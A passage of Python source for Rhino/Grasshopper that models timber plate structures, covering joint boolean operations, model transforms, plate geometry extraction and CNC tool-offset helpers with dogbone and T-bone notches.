                if str(i) == plates[j]: flag = True
        if flag == True:
            # match seam and direction
            self.plates[i].bottom_contour = Toolbox.Curves.resimplify_Curve(self.plates[i].bottom_contour)
            self.plates[i].bottom_contour = Toolbox.Curves.align_curve_direction(self.plates[i].top_contour, self.plates[i].bottom_contour)
            self.plates[i].top_contour, self.plates[i].bottom_contour = Toolbox.Curves.match_seams(self.plates[i].top_contour, self.plates[i].bottom_contour, True)
            # offset contour outside + create notches
            tmc, bmc = Toolbox.Curves.offset_with_tool(self.plates[i].top_contour, self.plates[i].bottom_contour, contour_tool_radius, notch, limit, tbone)
            self.plates[i].top_milling_contour = rs.coercecurve(tmc)
            self.plates[i].bottom_milling_contour = rs.coercecurve(bmc)
            if (cylinder is True) and (notch is True):
                _add_notch_solids(self.plates[i], Toolbox.Curves.get_spikes(tmc), Toolbox.Curves.get_spikes(bmc), contour_tool_radius, 1.0)
            # offset holes inside + create notches
            if self.plates[i].top_holes != [] :
                for j in range(len(self.plates[i].top_holes)):
                    tmh, bmh = Toolbox.Curves.offset_with_tool(self.plates[i].top_holes[j], self.plates[i].bottom_holes[j], -holes_tool_radius, notch, limit, tbone)
                    self.plates[i].top_milling_holes.append(rs.coercecurve(tmh))
                    self.plates[i].bottom_milling_holes.append(rs.coercecurve(bmh))
                    if (cylinder is True) and (notch is True):
                        # 1.001 slightly lengthens the cylinder to avoid coincident faces
                        _add_notch_solids(self.plates[i], Toolbox.Curves.get_spikes(tmh), Toolbox.Curves.get_spikes(bmh), holes_tool_radius, 1.001)
@__skip_nones
def perform_boolean_operations(self, plates='all', bool_tol=0.1, merge_tol=0.01):
    """Apply the stored joint solids to each selected plate brep.

    First unions joints_positives into the plate brep, then subtracts
    joints_negatives, clearing both lists for the processed plates.
    Failures are reported with print() and leave the plate unchanged.

    Parameters:
        plates: 'all', None or [] to process every plate, or a list of
            plate indices given as strings.
        bool_tol: tolerance passed to the boolean operations.
        merge_tol: tolerance used when merging coplanar faces afterwards.

    Fix: the boolean-difference pass previously evaluated
    `str(i) in plates`, which raised TypeError for plates=None and
    skipped everything for plates=[], inconsistent with the union pass;
    both passes now share the same selection rule.
    """
    def _selected(index):
        # None, 'all' and [] all mean "process every plate", matching the
        # selection logic of the other per-plate operations of this class.
        if plates is None or plates == 'all' or plates == []:
            return True
        return str(index) in plates
    # Boolean union
    for i in range(self.count):
        if _selected(i):
            if len(self.plates[i].joints_positives) != 0 :
                try:
                    # rhino_common methods (more reliable)
                    brep = rs.coercebrep(rs.CopyObject(self.plates[i].brep))
                    rhino_joined = rg.Brep.JoinBreps([brep]+self.plates[i].joints_positives, bool_tol)
                    rhino_unified = rg.Brep.CreateBooleanUnion(rhino_joined, bool_tol)[0]
                    rhino_unified.MergeCoplanarFaces(merge_tol, merge_tol)
                    # back to grasshopper
                    scriptcontext.doc.Objects.Add(rhino_unified)
                    self.plates[i].brep = rhino_unified
                except:
                    print("boolean addition failed on plate " + str(i))
                    # NOTE(review): this retry discards its result; kept from
                    # the original code, presumably for debugging purposes.
                    brep = rs.coercebrep(rs.CopyObject(self.plates[i].brep))
                    rhino_joined = rg.Brep.JoinBreps([brep]+self.plates[i].joints_positives, bool_tol)
                    rhino_unified = rg.Brep.CreateBooleanUnion(rhino_joined, bool_tol)
            self.plates[i].joints_positives = []
    # Boolean difference
    for i in range(self.count):
        if _selected(i):
            if len(self.plates[i].joints_negatives) != 0 :
                try:
                    for j in range(len(self.plates[i].joints_negatives)):
                        # check orientation: both solids must point outward for
                        # CreateBooleanDifference to behave correctly
                        self.plates[i].joints_negatives[j] = rs.coercebrep(self.plates[i].joints_negatives[j])
                        if(self.plates[i].joints_negatives[j].SolidOrientation == rg.BrepSolidOrientation.Inward):
                            rg.Brep.Flip(self.plates[i].joints_negatives[j])
                        if(self.plates[i].brep.SolidOrientation == rg.BrepSolidOrientation.Inward):
                            rg.Brep.Flip(self.plates[i].brep)
                        try:
                            self.plates[i].brep = rg.Brep.CreateBooleanDifference(self.plates[i].brep, self.plates[i].joints_negatives[j], bool_tol)[0]
                        except:
                            self.temp.append(self.plates[i].joints_negatives[j])
                            print('Boolean difference failed on plate '+str(i)+' with joint '+str(j))
                    # try merge faces
                    try:
                        rg.Brep.MergeCoplanarFaces(self.plates[i].brep, merge_tol, merge_tol)
                    except:
                        print("couldn't merge faces further on plate "+ str(i))
                    # back to grasshopper
                    scriptcontext.doc.Objects.Add(self.plates[i].brep)
                except: print("boolean difference failed on plate " + str(i))
            self.plates[i].joints_negatives = []
@__skip_nones
def transform(self,
    mode = 'Array',
    origin = rs.PlaneFromFrame((0,0,0), (1,0,0), (0,1,0)),
    step = (1,0,0),
    flip = None,
    custom = [],
    scale = 1.0,
    target = rs.PlaneFromFrame((0,0,0), (1,0,0), (0,1,0))):
    """Transform every plate of the model according to the chosen mode.

    Modes (the integers 1-5 are accepted as aliases):
        'Array'  - spread the plates along `step` starting from `origin`.
        'Stack'  - pile the plates flat on top of each other at `origin`.
        'Custom' - place each plate at the matching point of `custom`
                   (cycling when fewer points than plates are given).
        'Scale'  - scale the whole model around `origin` by `scale`.
        'Orient' - map the model from the `origin` plane to `target`.
    `flip` lists plate indices (as strings) to lay upside down in the
    Array/Stack/Custom modes.

    Refactor: the attribute-transformation code, previously duplicated
    for the plate loop and the module loop, is factored into one nested
    helper; behavior is unchanged.
    """
    def _transform_attributes(attributes, matrix):
        # Apply `matrix` to every attribute in place: geometry through
        # rhinoscript, vectors (re-unitized) and planes through rhinocommon.
        # Unhandled values other than the "gravity" placeholder are printed
        # for debugging.
        for j in range(len(attributes)):
            # attributes can be single values or lists of values
            if isinstance(attributes[j], list) is True:
                for k in range(len(attributes[j])):
                    try:
                        attributes[j][k] = rs.coercegeometry(rs.TransformObject(attributes[j][k], matrix))
                    except:
                        try:
                            rg.Vector3d.Transform(attributes[j][k], matrix)
                            rg.Vector3d.Unitize(attributes[j][k])
                        except:
                            try:
                                rg.Plane.Transform(attributes[j][k], matrix)
                            except:
                                if attributes[j][k] != "gravity": print(attributes[j][k], j, k)
            else:
                try:
                    attributes[j] = rs.coercegeometry(rs.TransformObject(attributes[j], matrix))
                except:
                    try:
                        rg.Vector3d.Transform(attributes[j], matrix)
                        rg.Vector3d.Unitize(attributes[j])
                    except:
                        try:
                            rg.Plane.Transform(attributes[j], matrix)
                        except:
                            if attributes[j] != "gravity": print(attributes[j], j)
    #array parameters
    if mode == 1 : mode = 'Array'
    if mode == 2 : mode = 'Stack'
    if mode == 3 : mode = 'Custom'
    if mode == 4 : mode = 'Scale'
    if mode == 5 : mode = 'Orient'
    valid_modes = ('Custom', 'Array', 'Stack', 'Scale', 'Orient')
    # origin may be given as a point triple instead of a plane
    if len(origin) == 3: origin = rs.PlaneFromFrame(origin, (1,0,0), (0,1,0))
    center = origin.Origin
    step = rs.VectorCreate(step, (0,0,0))
    #compute total stack height
    if mode == 'Stack':
        stack_height = 0
        for i in range(self.count):
            stack_height += self.plates[i].thickness
    #get transformation for each plate
    for i in range(self.count):
        #list of all attributes to be transformed
        attributes=[self.breps[i],
            self.contact_zones[i],
            self.contact_vectors[i],
            self.contact_spheres[i],
            self.contact_breps[i],
            self.contact_centers[i],
            self.contact_planes[i],
            self.contact_normals[i],
            self.FEM_joints[i],
            self.FEM_plates[i],
            self.plates[i].brep,
            self.plates[i].top_face,
            self.plates[i].bottom_face,
            self.plates[i].top_contour,
            self.plates[i].bottom_contour,
            self.plates[i].mid_contour,
            self.plates[i].top_holes,
            self.plates[i].bottom_holes,
            self.plates[i].top_center,
            self.plates[i].plate_center,
            self.plates[i].bottom_center,
            self.plates[i].top_normal,
            self.plates[i].bottom_normal,
            self.plates[i].top_plane,
            self.plates[i].mid_plane,
            self.plates[i].bottom_plane,
            self.plates[i].top_milling_contour,
            self.plates[i].bottom_milling_contour,
            self.plates[i].top_milling_holes,
            self.plates[i].bottom_milling_holes,
            self.plates[i].joints_positives,
            self.plates[i].joints_negatives,
            self.plates[i].joints_keys]
        # stack transform
        if mode == 'Stack':
            stack_height -= self.plates[i].thickness
            plate_height = stack_height + (self.plates[i].thickness /2 )
            point = rs.CopyObject(center, origin.ZAxis*plate_height)
        # array transform
        if mode == 'Array':
            point = rs.CopyObject(center, step * i)
        # custom transform (was a redundant loop assigning the same value)
        if mode == 'Custom':
            if custom != None and custom != []:
                point = custom[i % len(custom)]
            else:
                point = center
        # flip option
        if mode == 'Custom' or mode == 'Array' or mode == 'Stack':
            mid_plane = self.plates[i].mid_plane
            flat_plane = rs.PlaneFromFrame(point, origin.XAxis, origin.YAxis)
            if flip != None:
                if str(i) in flip:
                    self.log.append('plate '+ str(i) + ' was flipped')
                    flat_plane = rs.PlaneFromFrame(point, origin.XAxis, -origin.YAxis)
            # Matrix from Plane to plane orientation
            matrix = rg.Transform.PlaneToPlane(mid_plane, flat_plane)
        # Scaling transformation
        if mode == 'Scale':
            if scale <= 0 :
                scale = 1.0
                raise Exception('scaling factor should be greater than 0')
            self.plates[i].thickness = self.plates[i].thickness * scale
            matrix = rg.Transform.Scale(center, scale)
        # Orient (Move/rotate) transformation
        if mode == 'Orient':
            ref = origin
            matrix = rg.Transform.PlaneToPlane(ref, target)
        # Transforming each attribute
        if mode in valid_modes:
            _transform_attributes(attributes, matrix)
    for module in self.modules:
        #update attributes that are linked to plate and model class
        module.update()
        #update attributes that are independant of the model and plate class
        if mode in valid_modes:
            # NOTE: reuses the matrix computed for the last plate, as before
            _transform_attributes([module.assembly_vectors], matrix)
@__skip_nones
def switch_top_bottom(self, plates=[]):
    """Swap every top_*/bottom_* attribute pair of the selected plates.

    plates: 'all' for every plate, or a list of integer indices;
    the default empty list selects nothing.
    """
    # every attribute pair that gets exchanged
    swapped_suffixes = ('face', 'contour', 'holes', 'center',
                        'normal', 'plane', 'milling_contour', 'milling_holes')
    for idx in range(self.count):
        selected = (plates == 'all')
        if plates != [] and plates != None:
            for entry in plates:
                if entry == idx: selected = True
        if selected:
            plate = self.plates[idx]
            for suffix in swapped_suffixes:
                top_attr = 'top_' + suffix
                bottom_attr = 'bottom_' + suffix
                former_top = getattr(plate, top_attr)
                setattr(plate, top_attr, getattr(plate, bottom_attr))
                setattr(plate, bottom_attr, former_top)
#Modules -----------------------------------------------------------------------
class PlateModule(PlateModel):
    """A sub-assembly of a PlateModel: the subset of plates named by one
    step of the assembly sequence, with its topology lists mirrored from
    the parent model."""
    def __init__(self, model, index, step, sub_sequence, parent, children):
        # INITIALIZATION -------------------------------------
        self.temp = []
        self.model = model #inherit model attributes
        self.index = index
        # sub_sequence is a string literal describing nested plate indices
        parsed_sequence = ast.literal_eval(sub_sequence)
        self.plate_ids = Toolbox.Data.flatten_integer_list(parsed_sequence)
        self.plates = [self.model.plates[pid] for pid in self.plate_ids]
        self.breps = [plate.brep for plate in self.plates]
        self.count = len(parsed_sequence)
        self.count_all = len(self.breps)
        self.step = step
        self.sequence = sub_sequence
        self.parent = parent
        self.children = children
        self.assembly_spaces = [None]
        self.assembly_vectors = [None]
        self.assembly_relatives = [None]
        self.needed_supports = 1
        # TOPOLOGY -------------------------------------------
        self.contact_ids = [self.model.contact_ids[pid] for pid in self.plate_ids]
        self.contact_pairs = [self.model.contact_pairs[pid] for pid in self.plate_ids]
        self.contact_breps = [self.model.contact_breps[pid] for pid in self.plate_ids]
        self.contact_zones = [self.model.contact_zones[pid] for pid in self.plate_ids]
        self.contact_types = [self.model.contact_types[pid] for pid in self.plate_ids]
        self.contact_strings = [self.model.contact_strings[pid] for pid in self.plate_ids]
        self.contact_centers = [self.model.contact_centers[pid] for pid in self.plate_ids]
        self.contact_normals = [self.model.contact_normals[pid] for pid in self.plate_ids]
        self.contact_planes = [self.model.contact_planes[pid] for pid in self.plate_ids]
    def update(self):
        """Refresh the cached plate and contact references from the parent model."""
        self.plates = [self.model.plates[pid] for pid in self.plate_ids]
        self.breps = [plate.brep for plate in self.plates]
        self.contact_breps = [self.model.contact_breps[pid] for pid in self.plate_ids]
        self.contact_zones = [self.model.contact_zones[pid] for pid in self.plate_ids]
        self.contact_centers = [self.model.contact_centers[pid] for pid in self.plate_ids]
        self.contact_normals = [self.model.contact_normals[pid] for pid in self.plate_ids]
        self.contact_planes = [self.model.contact_planes[pid] for pid in self.plate_ids]
#Plates -----------------------------------------------------------------------
class Plate:
    """A planar plate extracted from a brep.

    On construction the brep is analysed once and all derived geometry
    (faces, contours, holes, centers, normals, planes, thickness) is
    cached as attributes. The getters below are ordered so that each one
    only depends on attributes already computed. Joinery and fabrication
    attributes start empty and are filled in later by the model's
    operations.
    """
    def __init__(self, brep, index):
        # INITIALIZATION -------------------------------------
        self.temp = []
        self.index = index
        # deep copy so later operations never mutate the caller's brep
        self.brep = copy.deepcopy(brep)
        # the two largest faces are taken as the plate's top and bottom
        self.top_face = self.__get_top_face()
        self.bottom_face = self.__get_bottom_face()
        self.top_contour = self.__get_top_contour()
        self.bottom_contour = self.__get_bottom_contour()
        self.mid_contour = self.__get_mid_contour()
        self.top_holes = self.__get_top_holes()
        self.bottom_holes = self.__get_bottom_holes()
        self.top_center = self.__get_top_center()
        self.bottom_center = self.__get_bottom_center()
        self.plate_center = self.__get_plate_center()
        self.top_normal = self.__get_top_normal()
        self.bottom_normal = self.__get_bottom_normal()
        self.top_plane = self.__get_top_plane()
        self.bottom_plane = self.__get_bottom_plane()
        self.mid_plane = self.__get_mid_plane()
        self.thickness = self.__get_thickness()
        # JOINERY --------------------------------------------
        self.joints_positives = []  # breps later unioned with the plate
        self.joints_negatives = []  # breps later subtracted from the plate
        self.joints_keys = []
        # FABRICATION ----------------------------------------
        self.top_milling_contour = None
        self.bottom_milling_contour = None
        self.top_milling_holes = []
        self.bottom_milling_holes = []
    def __get_top_face(self):
        """Return the higher (by centroid z) of the two largest brep faces."""
        faces = self.brep.Faces
        sortedfaces = Toolbox.Surfaces.sort_surfaces_by_area(faces)
        sortedfaces.reverse()
        top_and_bottom = [sortedfaces[0][0], sortedfaces[1][0]]
        top_face = Toolbox.Surfaces.sort_surfaces_by_altitude(top_and_bottom)[1][0]
        return top_face
    def __get_bottom_face(self):
        """Return the lower (by centroid z) of the two largest brep faces."""
        faces = self.brep.Faces
        sortedfaces = Toolbox.Surfaces.sort_surfaces_by_area(faces)
        sortedfaces.reverse()
        top_and_bottom = [sortedfaces[0][0], sortedfaces[1][0]]
        bottom_face = Toolbox.Surfaces.sort_surfaces_by_altitude(top_and_bottom)[0][0]
        return bottom_face
    def __get_top_contour(self):
        """Return the simplified outer border of the top face as a polyline curve."""
        largest_contour = Toolbox.Surfaces.get_face_largest_contour(self.top_face)
        # non-polyline borders are approximated by a polyline first
        if type(largest_contour) != rg.PolylineCurve: largest_contour = largest_contour.ToPolyline(0.01, 0.01, 0.01, 10000)
        largest_contour = Toolbox.Curves.resimplify_Curve(largest_contour)
        return largest_contour
    def __get_bottom_contour(self):
        """Return the bottom border, direction- and seam-matched to the top contour."""
        perimeter = Toolbox.Surfaces.get_face_largest_contour(self.bottom_face)
        perimeter = Toolbox.Curves.align_curve_direction(self.top_contour, perimeter)
        perimeter = Toolbox.Curves.match_seams(self.top_contour, perimeter)[1]
        if type(perimeter) != rg.PolylineCurve: perimeter = perimeter.ToPolyline(0.01, 0.01, 0.01, 10000)
        return perimeter
    def __get_mid_contour(self):
        """Return the polyline whose vertices average the top and bottom vertices pairwise."""
        top_vertices = rs.PolylineVertices(self.top_contour)
        bottom_vertices = rs.PolylineVertices(self.bottom_contour)
        mid_vertices = []
        for i in range(len(top_vertices)):
            mid_vertices.append((top_vertices[i] + bottom_vertices[i]) / 2)
        return rs.coercecurve(rs.AddPolyline(mid_vertices))
    def __get_top_holes(self):
        """Return every border of the top face except the outer contour."""
        return Toolbox.Surfaces.get_face_other_contours(self.top_face)
    def __get_bottom_holes(self):
        """Return the bottom-face holes, seam- and direction-matched to the top holes.

        NOTE(review): assumes top and bottom holes come back in the same
        order - confirm against get_face_other_contours.
        """
        perimeters = Toolbox.Surfaces.get_face_other_contours(self.bottom_face)
        if perimeters != [] :
            for i in range(len(perimeters)):
                # adjust seam to match the corresponding top hole
                new_seam = rg.Curve.ClosestPoint(perimeters[i], self.top_holes[i].PointAtStart)[1]
                perimeters[i].ChangeClosedCurveSeam(new_seam)
                # adjust direction
                perimeters[i] = Toolbox.Curves.align_curve_direction(self.top_holes[i], perimeters[i])
        return perimeters
    def __get_top_center(self):
        """Return the area centroid of the top contour."""
        return rs.CurveAreaCentroid(self.top_contour)[0]
    def __get_bottom_center(self):
        """Return the area centroid of the bottom contour."""
        return rs.CurveAreaCentroid(self.bottom_contour)[0]
    def __get_plate_center(self):
        """Return the midpoint between the top and bottom centers."""
        return (self.top_center + self.bottom_center) / 2
    def __get_top_normal(self):
        """Return the top face normal, flipped if needed to point away from the plate center."""
        normal = rs.SurfaceNormal(self.top_face, [0,0])
        if Toolbox.Vectors.is_vector_outward(self.plate_center, self.top_center, normal) is True:
            return normal
        else: return -normal
    def __get_bottom_normal(self):
        """Return the bottom face normal, flipped if needed to point away from the plate center."""
        normal = rs.SurfaceNormal(self.bottom_face, [0,0])
        if Toolbox.Vectors.is_vector_outward(self.plate_center, self.bottom_center, normal) is True:
            return normal
        else: return -normal
    def __get_top_plane(self):
        """Return a plane at the top center, normal to the top face,
        with its x axis along the longest edge of the top contour."""
        origin = self.top_center
        sides = rs.ExplodeCurves(rs.CopyObject(self.top_contour))
        longest_side = Toolbox.Curves.sort_curves_by_length(sides)[-1][0]
        x_axis = rs.VectorCreate(rs.CurveStartPoint(longest_side), rs.CurveEndPoint(longest_side))
        return rs.PlaneFromNormal(origin, self.top_normal, x_axis)
    def __get_bottom_plane(self):
        """Return a plane at the bottom center with the top plane's x and y axes swapped."""
        return rs.CreatePlane(self.bottom_center, self.top_plane.YAxis, self.top_plane.XAxis)
    def __get_mid_plane(self):
        """Return a plane at the plate center parallel to the top plane."""
        return rs.CreatePlane(self.plate_center, self.top_plane.XAxis, self.top_plane.YAxis)
    def __get_thickness(self):
        """Return the distance from the top center to its projection on the bottom plane."""
        pointA = self.top_center
        pointB = rg.Plane.ClosestPoint(self.bottom_plane, pointA)
        t = rg.Point3d.DistanceTo(pointA, pointB)
        return t
    pass
#Toolbox -----------------------------------------------------------------------
class Toolbox:
"""Class of geometrical functions extending the rhinocommon library"""
class Breps:
    """Helper functions operating on breps."""
    @staticmethod #wip
    def is_plate():
        pass
    @staticmethod
    def brep_edges(brep):
        """Return the duplicated edge curves of a brep as a list."""
        return [edge for edge in rg.Brep.DuplicateEdgeCurves(brep)]
    @staticmethod
    def brep_faces(brep):
        """Return the faces of a brep as a list."""
        # NOTE(review): '.faces' (lowercase) is kept from the original;
        # RhinoCommon exposes 'Faces' - confirm this attribute resolves.
        target = rs.coercebrep(brep)
        return [face for face in target.faces]
    @staticmethod
    def brep_vertices(brep):
        """Return the duplicated vertices of a brep as a list."""
        return [vertex for vertex in rg.Brep.DuplicateVertices(brep)]
    @staticmethod
    def brep_centroid(brep):
        """Return the area centroid of a brep."""
        return rg.AreaMassProperties.Compute(rs.coercebrep(brep)).Centroid
    @staticmethod
    def slice_2_planes(brep, top_plane, bottom_plane):
        """Trim a brep with a top plane then a bottom plane, capping the
        planar holes after each cut; a cut that removes everything is
        skipped and the previous solid is kept."""
        # top plane
        first_cut = rg.Brep.Trim(copy.deepcopy(brep), top_plane, 0.1)
        if len(first_cut) > 0:
            upper = rg.Brep.CapPlanarHoles(first_cut[0], 0.1)
        else:
            upper = copy.deepcopy(brep)
        # bottom plane
        second_cut = rg.Brep.Trim(copy.deepcopy(upper), bottom_plane, 0.1)
        if len(second_cut) > 0:
            result = rg.Brep.CapPlanarHoles(second_cut[0], 0.1)
        else:
            result = copy.deepcopy(upper)
        # back to grasshopper
        scriptcontext.doc.Objects.Add(result)
        return result
    @staticmethod
    def brep_from_2_poly(poly1, poly2):
        """Connect two matching closed polylines side by side and cap the
        result into a solid brep."""
        poly2 = Toolbox.Curves.align_curve_direction(rs.coercegeometry(poly1), rs.coercegeometry(poly2))
        poly2 = rs.AddPolyline(rs.PolylineVertices(poly2) + [rs.PolylineVertices(poly2)[0]])
        poly1, poly2 = Toolbox.Curves.match_seams(rs.coercecurve(poly1), rs.coercecurve(poly2))
        lower = rs.PolylineVertices(poly1)
        upper = rs.PolylineVertices(poly2)
        side_faces = []
        if len(lower) == len(upper):
            for idx in range(len(lower) - 1):
                quad = rs.AddPolyline([(lower[idx]), (lower[idx+1]), (upper[idx+1]), (upper[idx]), (lower[idx])])
                side_faces.append(rs.AddPlanarSrf(quad)[0])
        solid = rs.JoinSurfaces(side_faces)
        rs.CapPlanarHoles(solid)
        return rs.coercebrep(solid)
    @staticmethod
    def box_from_2_poly(poly1, poly2):
        """Build a box brep from the first four vertices of two polylines."""
        corner_points = rs.PolylineVertices(poly1)[0:4] + rs.PolylineVertices(poly2)[0:4]
        return rs.AddBox(corner_points)
    @staticmethod
    def box_from_6_planes(pair1, pair2, pair3):
        """create a deformed box from three pairs of planes. Planes of opposed faces should be grouped together."""
        corners = []
        for plane_a in pair1:
            for plane_b in pair2:
                for plane_c in pair3:
                    corners.append(Toolbox.Planes.three_planes_intersection(plane_a, plane_b, plane_c))
        lower = rs.AddPolyline([corners[0], corners[1], corners[3], corners[2], corners[0]])
        upper = rs.AddPolyline([corners[4], corners[5], corners[7], corners[6], corners[4]])
        return Toolbox.Breps.box_from_2_poly(lower, upper)
class Surfaces:
    """Helper functions operating on (planar) surfaces and brep faces."""
    @staticmethod
    def surface_centroid(surface):
        """Return the area centroid of a surface."""
        return rg.AreaMassProperties.Compute(rs.coercesurface(surface)).Centroid
    @staticmethod
    def sort_surfaces_by_altitude(planar_surfaces):
        """Return [surface, z] pairs sorted by centroid z value, ascending."""
        pairs = []
        for srf in planar_surfaces:
            centroid = Toolbox.Surfaces.surface_centroid(srf)
            pairs.append([srf, centroid[2]])
        return sorted(pairs, key=lambda pair: pair[1])
    @staticmethod
    def sort_surfaces_by_area(planar_surfaces):
        """Return [face, area] pairs sorted by area, ascending.

        Each face is duplicated as a standalone brep before measuring."""
        pairs = []
        for face in planar_surfaces:
            duplicated = rg.BrepFace.DuplicateFace(face, False)
            pairs.append([duplicated, rg.Brep.GetArea(duplicated)])
        return sorted(pairs, key=lambda pair: pair[1])
    @staticmethod
    def get_face_largest_contour(face):
        """Return the joined border curve of a face enclosing the largest area."""
        if str(face.ObjectType) == 'Surface':
            face = rg.Brep.CreateFromSurface(face)
        borders = rg.Curve.JoinCurves(rg.Brep.DuplicateEdgeCurves(face))
        pairs = []
        for border in borders:
            patch = rg.Brep.CreatePlanarBreps(border)
            pairs.append([border, rg.AreaMassProperties.Compute(patch).Area])
        # sort-then-reverse kept so that tie ordering matches the rest of the code
        ordered = sorted(pairs, key=lambda pair: pair[1])
        ordered.reverse()
        return ordered[0][0]
    @staticmethod
    def get_face_other_contours(face):
        """Return every joined border curve of a face except the largest one."""
        if str(face.ObjectType) == 'Surface':
            face = rg.Brep.CreateFromSurface(face)
        borders = rg.Curve.JoinCurves(rg.Brep.DuplicateEdgeCurves(face))
        pairs = []
        for border in borders:
            patch = rg.Brep.CreatePlanarBreps(border)
            pairs.append([border, rg.AreaMassProperties.Compute(patch).Area])
        ordered = sorted(pairs, key=lambda pair: pair[1])
        ordered.reverse()
        # drop the largest border, keep the rest (the holes)
        return [entry[0] for entry in ordered[1:]]
class Curves:
@staticmethod
def rectangle_dimensions(rectangle):
    """Return (length, width) of a rectangle, longest side first."""
    edges = rs.ExplodeCurves(rectangle)
    first = rs.CurveLength(edges[0])
    second = rs.CurveLength(edges[1])
    return (first, second) if first > second else (second, first)
@staticmethod
def offset_with_tool(crv_top, crv_bot, tool_radius, notch=False, limit=1, tbone=False):
    """Offset a pair of top/bottom curves by a tool radius for 5-axis CNC cutting.

    A positive tool_radius offsets outwards (contours), a negative one
    inwards (holes). With notch=True, dogbone or T-bone (tbone=True)
    notches are inserted at corners whose angle lies between `limit` and
    180-`limit` degrees, so the round tool can reach them.
    Returns the (top, bottom) offset polylines.
    """
    if tool_radius == 0 : return (crv_top, crv_bot)
    # convert to gh object to simplify the curve and reconvert to gh object
    crv_top = Toolbox.Curves.resimplify_Curve(crv_top)
    crv_bot = Toolbox.Curves.resimplify_Curve(crv_bot)
    crv_top = scriptcontext.doc.Objects.Add(crv_top)
    crv_bot = scriptcontext.doc.Objects.Add(crv_bot)
    # get surface normal
    normal = rs.SurfaceNormal(rs.AddPlanarSrf(crv_top), (0,0))
    # NOTE(review): normal2 is computed but never used
    normal2 = rs.SurfaceNormal(rs.AddPlanarSrf(crv_bot), (0,0))
    top_plane = rs.PlaneFromNormal(rs.CurveStartPoint(crv_top), normal)
    bot_plane = rs.PlaneFromNormal(rs.CurveStartPoint(crv_bot), normal)
    # check offset direction: reverse both curves when the top normal
    # points away from the bottom plane
    testpoint = rs.CopyObject(top_plane.Origin, 0.0001*normal)
    if (rs.Distance(bot_plane.Origin, testpoint) > rs.Distance(bot_plane.Origin, top_plane.Origin)):
        rs.ReverseCurve(crv_top)
        rs.ReverseCurve(crv_bot)
    # explode curves
    seg_top = rs.ExplodeCurves(crv_top)
    seg_bot = rs.ExplodeCurves(crv_bot)
    if rs.AddPlanarSrf(crv_top) is None: raise Exception('A curve is not planar')
    if len(seg_top) != len(seg_bot): raise Exception('Offset_with_tool requires top and bottom curves with the same amount of vertices')
    top_poly = []
    bot_poly = []
    # Create variable offset in function of the inclination of the tool:
    # each side face is offset along its own normal by the tool radius and
    # the new vertices are the intersections of consecutive side planes
    # with the top/bottom planes.
    for i in range(len(seg_top)):
        f1_plane = rs.PlaneFromPoints(rs.CurveStartPoint(seg_top[i-1]), rs.CurveEndPoint(seg_top[i-1]), rs.CurveStartPoint(seg_bot[i-1]))
        f2_plane = rs.PlaneFromPoints(rs.CurveStartPoint(seg_top[i]), rs.CurveEndPoint(seg_top[i]), rs.CurveStartPoint(seg_bot[i]))
        f1_plane = rs.MovePlane(f1_plane, rs.CopyObject(f1_plane.Origin, tool_radius * f1_plane.ZAxis))
        f2_plane = rs.MovePlane(f2_plane, rs.CopyObject(f2_plane.Origin, tool_radius * f2_plane.ZAxis))
        top_poly.append(Toolbox.Planes.three_planes_intersection(f1_plane, f2_plane, top_plane))
        bot_poly.append(Toolbox.Planes.three_planes_intersection(f1_plane, f2_plane, bot_plane))
    top_poly = rs.AddPolyline(top_poly+[top_poly[0]])
    bot_poly = rs.AddPolyline(bot_poly+[bot_poly[0]])
    # notch creation
    if notch is True:
        if tool_radius < 0: con = 1 # convex corner for inside milling
        else: con = -1 # concave corners for outside
        corner = Toolbox.Curves.corner_analysis(top_poly, con)
        angles = corner[2]
        ids = corner[3]
        tv = rs.PolylineVertices(crv_top) # top vertices
        tov = rs.PolylineVertices(top_poly) # top offset vertices
        bv = rs.PolylineVertices(crv_bot) # bottom vertices
        bov = rs.PolylineVertices(bot_poly) # bottom offset vertices
        ntov = [] # new top offset vertices
        nbov = [] # new bottom offset vertices
        for i in range(len(tov)):
            ntov.append(tov[i])
            nbov.append(bov[i])
            for j in range(len(ids)):
                # insert the notch point right after each flagged corner
                if i == ids[j]+1:
                    if angles[j]>limit and angles[j]<(180-limit):
                        # dogbone notch
                        if tbone is False:
                            ntov.append(Toolbox.Curves.create_dogbone_notch(tov[i], tv[i], tool_radius, rs.VectorCreate(tv[i], bv[i])))
                            nbov.append(Toolbox.Curves.create_dogbone_notch(bov[i], bv[i], tool_radius, rs.VectorCreate(tv[i], bv[i])))
                        else:
                            # T-bone notch aligned with the shorter adjacent edge
                            if rs.Distance(tv[i],tv[i-1]) < rs.Distance(tv[i],tv[(i+1)%(len(tv)-1)]):
                                axis = rs.VectorCreate(tv[i],tv[i-1])
                            else: axis = rs.VectorCreate(tv[i],tv[(i+1)%(len(tv)-1)])
                            ntov.append(Toolbox.Curves.create_tbone_notch(tov[i], tv[i], axis, rs.VectorCreate(tv[i], bv[i])))
                            nbov.append(Toolbox.Curves.create_tbone_notch(bov[i], bv[i], axis, rs.VectorCreate(tv[i], bv[i])))
                        # re-append the corner so the polyline returns to it
                        ntov.append(tov[i])
                        nbov.append(bov[i])
        top_poly = rs.AddPolyline(ntov)
        bot_poly = rs.AddPolyline(nbov)
    return (top_poly, bot_poly)
@staticmethod
def create_dogbone_notch(a, b, r, v):
    """Create a dogbone notch point at a given polyline vertex.

    a = offset point, b = polyline point, r = tool radius,
    v = tool inclination vector.
    Returns the coordinates of the notch point.
    """
    r = abs(r)  # only the magnitude of the tool radius matters here
    c = rs.AddLine(b, rs.CopyObject(b, v))
    d = rs.LineClosestPoint(c, a)
    e = rs.CopyObject(a, r * rs.VectorUnitize(rs.VectorCreate(d, a)))
    pl = rs.PlaneFromNormal(e, rs.VectorCreate(e, a))
    f = rs.LinePlaneIntersection([a, b], pl)
    dist = rs.Distance(f, b)
    # direction from the offset point towards the polyline vertex
    # (renamed from `dir`, which shadowed the builtin)
    direction = rs.VectorUnitize(rs.VectorCreate(b, a))
    g = rs.CopyObject(a, dist * direction)
    return rs.PointCoordinates(g)
@staticmethod
def create_tbone_notch(a, b, axis, v):
    """Create a t-bone notch point at a given polyline vertex.

    a = offset point, b = polyline point, axis = t-bone direction,
    v = tool inclination vector.
    """
    cutting_plane = rs.PlaneFromFrame(b, v, axis)
    cutting_plane = rs.RotatePlane(cutting_plane, 90, cutting_plane.XAxis)
    shifted = rs.CopyObject(a, axis)
    return rs.LinePlaneIntersection([a, shifted], cutting_plane)
@staticmethod
def curve_concave_points(curve):
    """Return the vertices of a closed polyline whose corners are concave."""
    segments = rs.ExplodeCurves(curve)
    normal = rs.CurveNormal(curve)
